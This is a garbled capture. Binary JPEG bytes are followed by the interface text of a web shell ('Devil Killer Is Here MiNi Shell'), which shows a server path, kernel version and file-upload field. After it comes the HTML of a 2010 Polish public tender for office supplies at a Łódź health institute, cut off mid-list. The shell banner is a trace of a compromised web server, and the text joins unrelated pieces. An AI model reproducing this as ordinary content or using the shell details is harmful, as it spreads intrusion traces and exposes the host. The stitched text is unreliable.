JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100907/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100907/280318-N-2010.html

<p class="kh_header"><b>Łódź: ZP/78/2010 - artykuły biurowe i piśmienne dla Instytutu CZMP</b><br>
<b>Numer ogłoszenia: 280318 - 2010; data zamieszczenia: 07.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut "Centrum Zdrowia Matki Polki" - Samodzielna Sekcja Organizacyjno-Prawna; Zamówienia Publiczne , ul. Rzgowska 281/289, 93-338 Łódź, woj. łódzkie, tel. 042 2711188, 2711069, faks 042 2711187.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.iczmp.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka badawczo-rozwojowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP/78/2010 - artykuły biurowe i piśmienne dla Instytutu CZMP.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> artykuły biurowe i piśmienne dla Instytutu CZMP.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 21.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p><br />1. zmiany stawki podatku VAT;
<br />2. zmiany nazwy handlowej produktu przy zachowaniu jego parametrów;
<br />3. zmiana terminu realizacji zamówienia w przypadku niewykorzystania ilości w okresie trwania umowy;
<br />4. zmiany przedmiotowej - produkt zamienny jeśli wystąpi przejściowy brak 
<br />produktu z przyczyn leżących po stronie producenta przy jednoczesnym 
<br />dostarczeniu produktu zamiennego o parametrach nie gorszych od produktu objętego umową;
<br />5. zmiany sposobu konfekcjonowania a co za tym idzie liczby opakowań. W 
<br />wyniku niniejszych zmian Zamawiający przewiduje możliwość zmiany ceny 
<br />jednostkowej opakowania, która zostanie wyliczona z proporcji;
<br />6. zmiany organizacyjnej Instytutu CZMP istotnej dla realizacji niniejszej umowy;
<br />7. zmiany formy prawnej prowadzonej działalności gospodarczej ;
<br />8. zmiany adresu siedziby firmy oraz siedziby  serwisu i zmianie adresu zamieszkania właściciela lub współwłaściciela firmy;
<br />9. w przypadku gdy zmiana jest korzystna dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.iczmp.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Centrum Zdrowia Matki Polki, 93-338 Łódź ul. Rzgowska 281/289, Samodzielna Sekcja Organizacyjno-Prawna Zamówienia Publiczne, pawilon A (Ginekologiczno-Położniczy), poziom 0, pokój Nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.09.2010 godzina 11:00, miejsce: Instytut Centrum Zdrowia Matki Polki, 93-338 Łódź ul. Rzgowska 281/289, Samodzielna Sekcja Organizacyjno-Prawna Zamówienia Publiczne, pawilon A (Ginekologiczno-Położniczy), poziom 0, pokój Nr 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET 1 - Papier utajniony i składanki komputerowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> <br />1. Papier utajniony - 3 składnikowy z perforacją, w kształcie kopert 210 x 12 /6 (1+2)	48 000	szt.
<br />2. Składanka komputerowa 240 x 12 (1+0)	5	op.
<br />3. Składanka komputerowa 240 x 12 (1+1)	5	op.
<br />4. Składanka komputerowa 240 x 12 (1+2)	30	op.
<br />5. Składanka komputerowa 240 x 12 (1+3)	50	op.
<br />6. Składanka komputerowa 250 x 12 (1+0)	2	op.
<br />7. Składanka komputerowa 250 x 12 (1+1)	12	op.
<br />8. Składanka komputerowa 250 x 12 (1+2) 	5	op.
<br />9. Składanka komputerowa 390 x 12 (1+0)	5	op.
<br />10. Składanka komputerowa 390 x 12 (1+1)	5	op.
<br />11. Składanka komputerowa 390 x 12 (1+2)	5	op.
<br />12. Składanka komputerowa 390 x 12 (1+3)	3	op.
<br />13. Składanka komputerowa 360 x 12 (1+1)	5	op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET 2 - Torby papierowe z atestem do kontaktu z żywnością.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> <br />1. Torba papierowa, biała, krzyżowa z atestem do kontaktu z żywnością -0,10 kg 	20	kg
<br />2. Torba papierowa, biała, krzyżowa z atestem do kontaktu z żywnością -0,25 kg	20	kg
<br />3. Torba papierowa, biała, krzyżowa, z atestem do kontaktu z żywnością - 1 kg	20	kg
<br />4. Torba papierowa, biała, krzyżowa, z atestem do kontaktu z żywnością - 2 kg	30	kg
<br />5. Torba papierowa, biała lub szara z atestem do kontaktu z żywnością -5 kg	20	kg
<br />6. Torba papierowa, biała lub szara z atestem do kontaktu z żywnością -10 kg	20	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET 3 - Papier ksero.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> <br />1. Papier ksero format A-4; gramatura 80g/m2 /1 ryza - 500 arkuszy/ 	3 000	ryz
<br />2. Papier ksero format A-4; gramatura 80g/m2, kolor /1 ryza - 500 arkuszy/ 	10	ryz
<br />3. Papier ksero format A-3; gramatura 80g/m2 /1 ryza - 500 arkuszy/ 	100	ryz
<br />4. Papier ksero format A-5; gramatura 80g/m2 /1 ryza - 500 arkuszy/ 	700	ryz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PAKIET 4 - Rolki do faksu i kas.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> <br />1. Rolki fax 216 x 30	110	szt.
<br />2. Rolki fax 210 x 30	100	szt.
<br />3. Rolki kasowe 57x25	150	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PAKIET 5 - Etykiety uniwersalne do drukarek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> <br />1. Etykiety uniwersalne do drukarek 88,9 x 35,7; jednorzędowe /op.-1 000 szt./ 	4	op.
<br />2. Etykiety samoprzylepne na arkuszu A-4 70 x 42,3 /op.-100 szt./	1	op.
<br />3. Etykiety samoprzylepne na arkuszu A-4 105 mm x 37 mm /op. - 100 szt./	1	op.
<br />4. Etykiety samoprzylepne A-4 105x48mm /op.100szt/	1	op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PAKIET 6 - Koperty białe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> <br />1. Koperty białe C-6 samoprzylepne 15 000	szt.
<br />2. Koperty białe C-5 samoprzylepne	15 000	szt.
<br />3. Koperty białe C-4 samoprzylepne	34 000	szt.
<br />4. Koperty białe B-5 samoprzylepne	45 000	szt.
<br />5. Koperty białe B-4 samoprzylepne	8 000	szt.
<br />6. Koperty białe DL samoprzylepne z okienkiem /prawym i lewym wg. zapotrzebowania	2 000	szt.
<br />7. Koperty białe DL samoprzylepne 	1 000	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> PAKIET 7 - Tomofan bezbarwny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> <br />1. Tomofon bezbarwny z atestem	240	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> PAKIET 8 - Blok makulatorowy, zeszyty, papier podaniowy, kostki klejone, skorowidz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> <br />1. Blok makulaturowy A-4 - 96 kart. (kratka)	400	szt.
<br />2. Blok makulaturowy A-5 - 96 kart (kratka)	400	szt.
<br />3. Zeszyt A-5 16 kartkowy szyty (kratka)	250	szt.
<br />4. Zeszyt A-5 32 kartkowy szyty (kratka)	400	szt.
<br />5. Zeszyt A-5 60 kartkowy szyty (kratka)	500	szt.
<br />6. Zeszyt A-5 96 kartkowy szyty, sztywna okładka (kratka)	500	szt.
<br />7. Zeszyt A-4 96 kartkowy szyty, sztywna okładka (kratka)	500	szt.
<br />8. Zeszyt A-4 192 kartkowy szyty, sztywna okładka (kratka)	250	szt.
<br />9. Papier pakowy szary 125 cm x 100 cm	30	kg
<br />10. Kostki klejone 92 x 77 x 60  /1op.-500 kartek klejonych/	20	op.
<br />11. Bloczki samoprzylepne 75 x 75  /1bl. - 100 kartek/	20	bl.
<br />12. Skorowidz A-4	10	szt.
<br />13. Skorowidz 1/2 A-4	10	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> PAKIET 9 - Długopisy, mazaki, markery, foliopis, cienkopisy, ołówki, rysiki, wkłady do długopisów i cienkopisów, zakreślacze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> <br />1. Długopis typu Zenith	50	szt.
<br />2. Długopis na przylepce - leżące	3	szt.
<br />3. Mazaki wodoodporne czarne z końcówką stożkową - pernamentne, spirytusowe	1 300	szt.
<br />4. Markery zdobnicze, olejowe do pisania na metalu, szkle, plastiku i gumie - grubość pisania 0,8 - 1,2 mm /kolor: czarny, biały, srebny, złoty/	30	szt.
<br />5. Cienkopis permanentny, wodoodporny do pisania na szkle /Staedtler Lumacolor S/ o grub. 0,4mm, czarny.	50	szt.
<br />6. Marker wodoodporny Sanford R Sharpie standardowe 0,4 mm	30	szt.
<br />7. Marker wodoodporny Sanford R Sharpie cienkopiszący 0,2 mm	30	szt.
<br />8. Foliopis - do pisania na płytach CD	120	szt.
<br />9. Mazaki zwykłe /kolory wg. zamówienia/	150	szt.
<br />10. Cienkopis żelowy z wkładem wymiennym 0,5	100	szt.
<br />11. Ołówki HB z gumką	1 500	szt
<br />12. Ołówek automatyczny 0,5 HB	10	szt.
<br />13. Rysiki - grafity do ołówków automatycznych 0,5 HB	5	op.
<br />14. Wkład typu Zenith                                                                            /kolory wg. zamówienia/	1 400	szt.
<br />15. Wkład zwykły /kolory wg. zamówienia/	1 000	szt.
<br />16.	Wkłady do piór kulkowych Parker  /Roller Ball/ 	12	szt.
<br />17.	Wkłady do cienkopisów żelowych 0,5 (kolory wg zamówienia	120	szt.
<br />18.	Zakreślacze /kolory wg. zamówienia/	50	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> PAKIET 10 - Korektory.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> <br />1. Korektor w płynie z gąbką 20 ml	400	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> PAKIET 11 - Poduszki i tusz do stempli, tusz do numeratora, wkład do numeratora automatycznego, maczałka..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> <br />1. Poduszka do stempli duża   /160 mm x 90 mm/	20	szt.
<br />2. Poduszka do stempli samotuszująca mała /90 mm x 50 mm/	30	szt.
<br />3. Tusz do stempli 50ml automat /kolory wg. zamówienia/	180	szt.
<br />4. Tusz do numeratora /kolory wg. zamówienia/	6	szt.
<br />5. Wkład do numeratora automatycznego /REINER B6K/	3	szt.
<br />6. Maczałka	5	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> PAKIET 12 - Pinezki, spinacze metalowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> <br />1. Pinezki /op.-100 szt./	10	op.
<br />2. Spinacze metalowe duże /op.-100 szt./	200	op.
<br />3. Spinacze metalowe trójkątne małe /op.-100 szt./	1 500	op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> PAKIET 13 - Temperówki, nożyczki, gumki, linijki, klej biurowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> <br />1. Temperówka	100	szt.
<br />2. Nożyczki 19 cm	20	szt.
<br />3. Gumka	200	szt.
<br />4. Linijka 30 cm	100	szt.
<br />5. Linijka 50 cm	20	szt.
<br />6. Klej biurowy w płynie 40 ml	500	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> PAKIET 14 - Dziurkacze, zszywacze, zszywki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> <br />1. Dziurkacz	50	szt.
<br />2. Dziurkacz duży, żeliwny	5	szt.
<br />3. Zszywacz	100	szt.
<br />4. Zszywacz mini	20	szt.
<br />5. Zszywki 24/6 	1 200	op.
<br />6. Zszywki mini No 10	300	op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> PAKIET 15 - Datownik automatyczny, numerator automatyczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> <br />1. Datownik automatyczny	50	szt.
<br />2. Numerator automatyczny  /wysokość cyfr ok. 1 cm/ 	1	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> PAKIET 16 - Kalka maszynowa, taśmy różne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> <br />1. Kalka maszynowa A-4 -czarna /op.-100 szt./	15	op.
<br />2. Kalka ołówkowa A-3 czarna  /op.-100 szt./	10	op.
<br />3. Taśma /13 mm x 10 m/ czarna	20	szt.
<br />4. Taśma /13 mm x 6m/ czerwono-czarna	40	szt.
<br />5. Taśma do metkownic Tovel i Biltz  C-20 /2 wierszowa/	3 200	szt.
<br />6. Taśma klejąca przezroczysta 18mm/20m	500	szt.
<br />7. Taśma klejąca przezroczysta 25mm/20m	20	szt.
<br />8. Taśma pakowa plastikowa  szer. 48 mm x 66 m 	300	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> PAKIET 17 - Koszulki foliowe, segregatory, skoroszyty, teczki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> <br />1. Koszulki foliowe A-4 /op.-100 szt./ przezroczyste z grzbietem do wpinania	400	op.
<br />2. Koszulki foliowe A-5 /op.-100 szt./                                                                                                     przezroczyste z grzbietem do wpinania	100	op.
